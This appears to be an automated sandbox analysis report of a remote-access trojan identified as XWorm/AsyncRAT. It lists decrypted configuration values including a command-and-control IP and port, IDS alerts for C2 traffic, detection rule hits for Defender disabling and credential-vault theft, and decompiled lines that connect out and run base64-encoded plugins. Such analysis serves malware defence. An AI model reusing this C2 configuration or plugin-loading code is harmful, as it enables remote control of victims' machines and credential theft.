Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: 91.92.242.85 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: 3344 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: <123456789> |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: <Xwormmm> |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: XWorm V5.6 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
String decryptor: USB.exe |
Source: Traffic |
Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2853191 ETPRO TROJAN Win32/XWorm V3 CnC Command - savePlugin Inbound 91.92.242.85:3344 -> 192.168.2.5:49705 |
Source: Traffic |
Snort IDS: 2852873 ETPRO TROJAN Win32/XWorm CnC PING Command Outbound M2 192.168.2.5:49706 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.5:49706 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 91.92.242.85:3344 -> 192.168.2.5:49705 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 91.92.242.85:3344 -> 192.168.2.5:49705 |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: Traffic |
Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49705 -> 91.92.242.85:3344 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 91.92.242.85 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: http://james.newtonking.com/projects/json |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3256072800.0000000002751000.00000004.00000800.00020000.00000000.sdmp, 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://github.com/LimerBoy/StormKitty |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://support.mozilla.org |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_see |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://urn.to/r/sds_seeaCould |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: tmp141D.tmp.dat.0.dr, tmp9EE9.tmp.dat.0.dr |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3257323958.00000000128F8000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox |
Source: tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3257323958.00000000128F8000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3257323958.00000000128F8000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmp896E.tmp.dat.0.dr |
String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www. |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.newtonsoft.com/jsonschema |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.unpack, type: UNPACKEDPE |
Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen |
Source: 00000000.00000002.3255984514.0000000002560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen |
Source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: Detects AsyncRAT Author: ditekSHen |
Source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F26B22 |
0_2_00007FF848F26B22 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F2A6A8 |
0_2_00007FF848F2A6A8 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F29562 |
0_2_00007FF848F29562 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F25D76 |
0_2_00007FF848F25D76 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F2AF3A |
0_2_00007FF848F2AF3A |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F22A48 |
0_2_00007FF848F22A48 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F31267 |
0_2_00007FF848F31267 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F23A6D |
0_2_00007FF848F23A6D |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F328FA |
0_2_00007FF848F328FA |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F2D130 |
0_2_00007FF848F2D130 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F329D3 |
0_2_00007FF848F329D3 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F25879 |
0_2_00007FF848F25879 |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Code function: 0_2_00007FF848F41060 |
0_2_00007FF848F41060 |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3255984514.0000000002560000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameOptions.dll0 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp |
Binary or memory string: OriginalFilenameRecovery.dll2 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilenameXClient.exe4 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Binary or memory string: OriginalFilenameXClient.exe4 vs 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, type: SAMPLE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.0.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.3a0000.0.unpack, type: UNPACKEDPE |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.1c070000.2.raw.unpack, type: UNPACKEDPE |
Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers |
Source: 00000000.00000002.3255984514.0000000002560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender |
Source: 00000000.00000000.1986182234.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT |
Source: 00000000.00000002.3258964469.000000001C070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY |
Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, ClientSocket.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Helper.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Helper.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Botkiller.cs |
Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole) |
Source: 0.2.1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe.2560000.1.raw.unpack, Botkiller.cs |
Security API names: System.Security.Principal.WindowsIdentity.GetCurrent() |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: mscoree.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: version.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: vcruntime140_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: ucrtbase_clr0400.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: wbemcomn.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: amsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: avicap32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: msvfw32.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: winmm.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: ntmarta.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: vaultcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: 1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe, Messages.cs |
.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true) |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\Desktop\1714456685abe8dacd9647979ca6f07fce954d21483995c56b392e9993fc4dbb806aaf5610733.dat-decoded.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
